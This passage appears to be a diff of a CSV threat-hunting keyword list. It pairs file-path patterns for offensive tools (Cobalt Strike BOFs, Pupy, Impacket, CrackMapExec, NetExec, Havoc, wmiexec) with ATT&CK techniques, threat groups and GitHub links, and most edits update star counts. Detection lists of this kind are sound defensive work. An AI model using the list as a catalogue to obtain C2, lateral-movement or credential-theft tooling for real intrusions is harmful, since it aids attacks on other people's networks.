- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/WindowsVault.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/win-enum-resources*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/WinPwn*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*/WinPwn.git*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*/WinPwn_Repo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*/WinPwnage*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/winregistry.py**","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/WindowsVault.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/WindowsVault.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/win-enum-resources*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/WinPwn*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn.git*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn_Repo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwnage*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/winregistry.py**","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/winrm.cpp*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" -"*/winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/winrmdll*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winrm-reflective-dll/*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" -"*/Winsocky.git*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*/winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Winsocky.git*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*/wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/wiresocks.git*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*/wmeye/*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*/WMI Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/wmi.dropper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/WMI/wmi.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/wmiexec/*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*/WMI/wmi.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/wmiexec/*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*/wmiexec2.git*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*/wmiexec-Pro*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*/wmisploit*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*/word_list.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/word_list.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/word_list.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/word_list.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/wordlists/owa_directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/wordlists/skype-directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*/workflow/test/dirbscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/workflow/test/dirbscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" "*/wpaf/finder.py*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*/wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/WSPCoerce.git*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*/ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 